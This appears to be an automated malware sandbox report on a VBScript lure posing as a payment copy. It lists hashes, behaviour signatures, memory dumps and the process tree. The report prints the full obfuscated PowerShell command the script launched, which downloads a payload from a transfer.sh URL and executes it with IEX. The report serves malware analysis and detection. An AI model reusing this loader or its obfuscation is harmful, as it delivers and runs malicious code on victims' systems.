1aa032a3d316f19de0c0946185eb7331aa1270d52882550c867eae1ce540ade1

General

Target

KVDKGYBAXAKQX_PAYMENT_COPY.vbs
Size

9KB
MD5

8ade0a04317db340d7dcdc9a4b32c795
SHA1

30350a6e2339507039e86a68a99958b1d9dea157
SHA256

1aa032a3d316f19de0c0946185eb7331aa1270d52882550c867eae1ce540ade1
SHA512

7572ebc9ae53a8639285b849fa972d4f40eaf3a923e43430f85337a73810bdeb487d0231ffdb4f0391442c2acdb244ab03063ed0ddc78cd12248431476c2cdaf

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://transfer.sh/get/gnXbHK/ServerSHJWIJW8292.txt

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

POWERSHELL.exe

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1248	1072	POWERSHELL.exe

Drops file in System32 directory 1 IoCs

Processes:

POWERSHELL.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	POWERSHELL.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

POWERSHELL.exe

pid process

1248 POWERSHELL.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

POWERSHELL.exe

description pid process

Token: SeDebugPrivilege 1248 POWERSHELL.exe

pid	process
1248	POWERSHELL.exe

description	pid	process
Token: SeDebugPrivilege	1248	POWERSHELL.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\KVDKGYBAXAKQX_PAYMENT_COPY.vbs"
1⤵
PID:1720

C:\Windows\System32\WindowsPowerShell\v1.0\POWERSHELL.exe
POWERSHELL $Hx = 'https://transfer.sh/get/gnXbHK/ServerSHJWIJW8292.txt';$HB=('{2}{0}{1}' -f'\##)]74/5_472\8}3{_()8+&{09}39^}0}0@8(7[<5</&!@4%8&]3%}_+[}(/0]]59]7)[*^*{)%9=1%\6@}=)-[<)_#-)\+83{l\##)]74/5_472\8}3{_()8+&{09}39^}0}0@8(7[<5</&!@4%8&]3%}_+[}(/0]]59]7)[*^*{)%9=1%\6@}=)-[<)_#-)\+83{o\##)]74/5_472\8}3{_()8+&{09}39^}0}0@8(7[<5</&!@4%8&]3%}_+[}(/0]]59]7)[*^*{)%9=1%\6@}=)-[<)_#-)\+83{a\##)]74/5_472\8}3{_()8+&{09}39^}0}0@8(7[<5</&!@4%8&]3%}_+[}(/0]]59]7)[*^*{)%9=1%\6@}=)-[<)_#-)\+83{d\##)]74/5_472\8}3{_()8+&{09}39^}0}0@8(7[<5</&!@4%8&]3%}_+[}(/0]]59]7)[*^*{)%9=1%\6@}=)-[<)_#-)\+83{'.Replace('\##)]74/5_472\8}3{_()8+&{09}39^}0}0@8(7[<5</&!@4%8&]3%}_+[}(/0]]59]7)[*^*{)%9=1%\6@}=)-[<)_#-)\+83{',''),'9$6%(_209}!#/[!+{/25&&27176=/]/76/=1=+-6+0%1_8+*#\4=7/9=#<%#%0@#]57140/36]$731*{^)!1-718_<)-8@+#/25s9$6%(_209}!#/[!+{/25&&27176=/]/76/=1=+-6+0%1_8+*#\4=7/9=#<%#%0@#]57140/36]$731*{^)!1-718_<)-8@+#/25t9$6%(_209}!#/[!+{/25&&27176=/]/76/=1=+-6+0%1_8+*#\4=7/9=#<%#%0@#]57140/36]$731*{^)!1-718_<)-8@+#/25r9$6%(_209}!#/[!+{/25&&27176=/]/76/=1=+-6+0%1_8+*#\4=7/9=#<%#%0@#]57140/36]$731*{^)!1-718_<)-8@+#/25i9$6%(_209}!#/[!+{/25&&27176=/]/76/=1=+-6+0%1_8+*#\4=7/9=#<%#%0@#]57140/36]$731*{^)!1-718_<)-8@+#/25n9$6%(_209}!#/[!+{/25&&27176=/]/76/=1=+-6+0%1_8+*#\4=7/9=#<%#%0@#]57140/36]$731*{^)!1-718_<)-8@+#/25g9$6%(_209}!#/[!+{/25&&27176=/]/76/=1=+-6+0%1_8+*#\4=7/9=#<%#%0@#]57140/36]$731*{^)!1-718_<)-8@+#/25'.Replace('9$6%(_209}!#/[!+{/25&&27176=/]/76/=1=+-6+0%1_8+*#\4=7/9=#<%#%0@#]57140/36]$731*{^)!1-718_<)-8@+#/25',''),'&1+$3/2&0^3_@#+][<!__4<!4+7[}6282]2-}682=++=(!8!*%[#(@%#2!!#-6+4%})^@\3_-9/<#8={$[0@!)__#)=%[}0&<(9D&1+$3/2&0^3_@#+][<!__4<!4+7[}6282]2-}682=++=(!8!*%[#(@%#2!!#-6+4%})^@\3_-9/<#8={$[0@!)__#)=%[}0&<(9o&1+$3/2&0^3_@#+][<!__4<!4+7[}6282]2-}682=++=(!8!*%[#(@%#2!!#-6+4%})^@\3_-9/<#8={$[0@!)__#)=%[}0&<(9w&1+$3/2&0^3_@#+][<!__4<!4+7[}6282]2-}682=++=(!8!*%[#(@%#2!!#-6+4%})^@\3_-9/<#8={$[0@!)__#)=%[}0&<(9n&1+$3/2&0^3_@#+][<!__4<!4+7[}6282]2-}682=++=(!8!*%[#(@%#2!!#-6+4%})^@\3_-9/<#8={$[0@!)__#)=%[}0&<(9'.Replace('&1+$3/2&0^3_@#+][<!__4<!4+7[}6282]2-}682=++=(!8!*%[#(@%#2!!#-6+4%})^@\3_-9/<#8={$[0@!)__#)=%[}0&<(9',''));$HBB=('{2}{0}{1}' -f'\##)]74/5_472\8}3{_()8+&{09}39^}0}0@8(7[<5</&!@4%8&]3%}_+[}(/0]]59]7)[*^*{)%9=1%\6@}=)-[<)_#-)\+83{e\##)]74/5_472\8}3{_()8+&{09}39^}0}0@8(7[<5</&!@4%8&]3%}_+[}(/0]]59]7)[*^*{)%9=1%\6@}=)-[<)_#-)\+83{b\##)]74/5_472\8}3{_()8+&{09}39^}0}0@8(7[<5</&!@4%8&]3%}_+[}(/0]]59]7)[*^*{)%9=1%\6@}=)-[<)_#-)\+83{C\##)]74/5_472\8}3{_()8+&{09}39^}0}0@8(7[<5</&!@4%8&]3%}_+[}(/0]]59]7)[*^*{)%9=1%\6@}=)-[<)_#-)\+83{l\##)]74/5_472\8}3{_()8+&{09}39^}0}0@8(7[<5</&!@4%8&]3%}_+[}(/0]]59]7)[*^*{)%9=1%\6@}=)-[<)_#-)\+83{'.Replace('\##)]74/5_472\8}3{_()8+&{09}39^}0}0@8(7[<5</&!@4%8&]3%}_+[}(/0]]59]7)[*^*{)%9=1%\6@}=)-[<)_#-)\+83{',''),'\##)]74/5_472\8}3{_()8+&{09}39^}0}0@8(7[<5</&!@4%8&]3%}_+[}(/0]]59]7)[*^*{)%9=1%\6@}=)-[<)_#-)\+83{i\##)]74/5_472\8}3{_()8+&{09}39^}0}0@8(7[<5</&!@4%8&]3%}_+[}(/0]]59]7)[*^*{)%9=1%\6@}=)-[<)_#-)\+83{e\##)]74/5_472\8}3{_()8+&{09}39^}0}0@8(7[<5</&!@4%8&]3%}_+[}(/0]]59]7)[*^*{)%9=1%\6@}=)-[<)_#-)\+83{n\##)]74/5_472\8}3{_()8+&{09}39^}0}0@8(7[<5</&!@4%8&]3%}_+[}(/0]]59]7)[*^*{)%9=1%\6@}=)-[<)_#-)\+83{t\##)]74/5_472\8}3{_()8+&{09}39^}0}0@8(7[<5</&!@4%8&]3%}_+[}(/0]]59]7)[*^*{)%9=1%\6@}=)-[<)_#-)\+83{'.Replace('\##)]74/5_472\8}3{_()8+&{09}39^}0}0@8(7[<5</&!@4%8&]3%}_+[}(/0]]59]7)[*^*{)%9=1%\6@}=)-[<)_#-)\+83{',''),'\##)]74/5_472\8}3{_()8+&{09}39^}0}0@8(7[<5</&!@4%8&]3%}_+[}(/0]]59]7)[*^*{)%9=1%\6@}=)-[<)_#-)\+83{Ne\##)]74/5_472\8}3{_()8+&{09}39^}0}0@8(7[<5</&!@4%8&]3%}_+[}(/0]]59]7)[*^*{)%9=1%\6@}=)-[<)_#-)\+83{t\##)]74/5_472\8}3{_()8+&{09}39^}0}0@8(7[<5</&!@4%8&]3%}_+[}(/0]]59]7)[*^*{)%9=1%\6@}=)-[<)_#-)\+83{.W\##)]74/5_472\8}3{_()8+&{09}39^}0}0@8(7[<5</&!@4%8&]3%}_+[}(/0]]59]7)[*^*{)%9=1%\6@}=)-[<)_#-)\+83{'.Replace('\##)]74/5_472\8}3{_()8+&{09}39^}0}0@8(7[<5</&!@4%8&]3%}_+[}(/0]]59]7)[*^*{)%9=1%\6@}=)-[<)_#-)\+83{',''));$GSUAKNINNSESVPWHEQDXGURPSZLTOWJENLREXSBRNWNLWJBZJXDWWSWOHCQSHEDVYNSJYNALEJCJUSOTCFSJPKQUOZHBDYGCLWY=('{2}{0}{1}' -f'{=-<)@6_0#%1{(*/]]0-}5/3=6)}\<$1}</2+]_16/!8/)/[0[$__}%)-_8%-!-!<%6}_^9<70([}+548-&2&{!1&001_79}7<9w-O{=-<)@6_0#%1{(*/]]0-}5/3=6)}\<$1}</2+]_16/!8/)/[0[$__}%)-_8%-!-!<%6}_^9<70([}+548-&2&{!1&001_79}7<9b{=-<)@6_0#%1{(*/]]0-}5/3=6)}\<$1}</2+]_16/!8/)/[0[$__}%)-_8%-!-!<%6}_^9<70([}+548-&2&{!1&001_79}7<9j{=-<)@6_0#%1{(*/]]0-}5/3=6)}\<$1}</2+]_16/!8/)/[0[$__}%)-_8%-!-!<%6}_^9<70([}+548-&2&{!1&001_79}7<9e{=-<)@6_0#%1{(*/]]0-}5/3=6)}\<$1}</2+]_16/!8/)/[0[$__}%)-_8%-!-!<%6}_^9<70([}+548-&2&{!1&001_79}7<9c{=-<)@6_0#%1{(*/]]0-}5/3=6)}\<$1}</2+]_16/!8/)/[0[$__}%)-_8%-!-!<%6}_^9<70([}+548-&2&{!1&001_79}7<9t ${=-<)@6_0#%1{(*/]]0-}5/3=6)}\<$1}</2+]_16/!8/)/[0[$__}%)-_8%-!-!<%6}_^9<70([}+548-&2&{!1&001_79}7<9H{=-<)@6_0#%1{(*/]]0-}5/3=6)}\<$1}</2+]_16/!8/)/[0[$__}%)-_8%-!-!<%6}_^9<70([}+548-&2&{!1&001_79}7<9'.Replace('{=-<)@6_0#%1{(*/]]0-}5/3=6)}\<$1}</2+]_16/!8/)/[0[$__}%)-_8%-!-!<%6}_^9<70([}+548-&2&{!1&001_79}7<9',''),'{=-<)@6_0#%1{(*/]]0-}5/3=6)}\<$1}</2+]_16/!8/)/[0[$__}%)-_8%-!-!<%6}_^9<70([}+548-&2&{!1&001_79}7<9BB{=-<)@6_0#%1{(*/]]0-}5/3=6)}\<$1}</2+]_16/!8/)/[0[$__}%)-_8%-!-!<%6}_^9<70([}+548-&2&{!1&001_79}7<9).$H{=-<)@6_0#%1{(*/]]0-}5/3=6)}\<$1}</2+]_16/!8/)/[0[$__}%)-_8%-!-!<%6}_^9<70([}+548-&2&{!1&001_79}7<9B({=-<)@6_0#%1{(*/]]0-}5/3=6)}\<$1}</2+]_16/!8/)/[0[$__}%)-_8%-!-!<%6}_^9<70([}+548-&2&{!1&001_79}7<9$H{=-<)@6_0#%1{(*/]]0-}5/3=6)}\<$1}</2+]_16/!8/)/[0[$__}%)-_8%-!-!<%6}_^9<70([}+548-&2&{!1&001_79}7<9x){=-<)@6_0#%1{(*/]]0-}5/3=6)}\<$1}</2+]_16/!8/)/[0[$__}%)-_8%-!-!<%6}_^9<70([}+548-&2&{!1&001_79}7<9'.Replace('{=-<)@6_0#%1{(*/]]0-}5/3=6)}\<$1}</2+]_16/!8/)/[0[$__}%)-_8%-!-!<%6}_^9<70([}+548-&2&{!1&001_79}7<9',''),'{=-<)@6_0#%1{(*/]]0-}5/3=6)}\<$1}</2+]_16/!8/)/[0[$__}%)-_8%-!-!<%6}_^9<70([}+548-&2&{!1&001_79}7<9I{=-<)@6_0#%1{(*/]]0-}5/3=6)}\<$1}</2+]_16/!8/)/[0[$__}%)-_8%-!-!<%6}_^9<70([}+548-&2&{!1&001_79}7<9`E{=-<)@6_0#%1{(*/]]0-}5/3=6)}\<$1}</2+]_16/!8/)/[0[$__}%)-_8%-!-!<%6}_^9<70([}+548-&2&{!1&001_79}7<9`X({=-<)@6_0#%1{(*/]]0-}5/3=6)}\<$1}</2+]_16/!8/)/[0[$__}%)-_8%-!-!<%6}_^9<70([}+548-&2&{!1&001_79}7<9Ne{=-<)@6_0#%1{(*/]]0-}5/3=6)}\<$1}</2+]_16/!8/)/[0[$__}%)-_8%-!-!<%6}_^9<70([}+548-&2&{!1&001_79}7<9'.Replace('{=-<)@6_0#%1{(*/]]0-}5/3=6)}\<$1}</2+]_16/!8/)/[0[$__}%)-_8%-!-!<%6}_^9<70([}+548-&2&{!1&001_79}7<9',''));$HBBBBB = ($GSUAKNINNSESVPWHEQDXGURPSZLTOWJENLREXSBRNWNLWJBZJXDWWSWOHCQSHEDVYNSJYNALEJCJUSOTCFSJPKQUOZHBDYGCLWY -Join '')|I`E`X
1⤵
- Process spawned unexpected child process
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1248

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1248-54-0x000007FEFBD31000-0x000007FEFBD33000-memory.dmp

Filesize
8KB

Download
memory/1248-55-0x000007FEF2ED0000-0x000007FEF3A2D000-memory.dmp

Filesize
11.4MB

Download
memory/1248-56-0x000007FEF5340000-0x000007FEF5CDD000-memory.dmp

Filesize
9.6MB

Download
memory/1248-58-0x00000000027E0000-0x00000000027E2000-memory.dmp

Filesize
8KB

Download
memory/1248-57-0x00000000027EB000-0x000000000280A000-memory.dmp

Filesize
124KB

Download
memory/1248-59-0x00000000027E4000-0x00000000027E7000-memory.dmp

Filesize
12KB

Download
memory/1248-60-0x000007FEF5340000-0x000007FEF5CDD000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing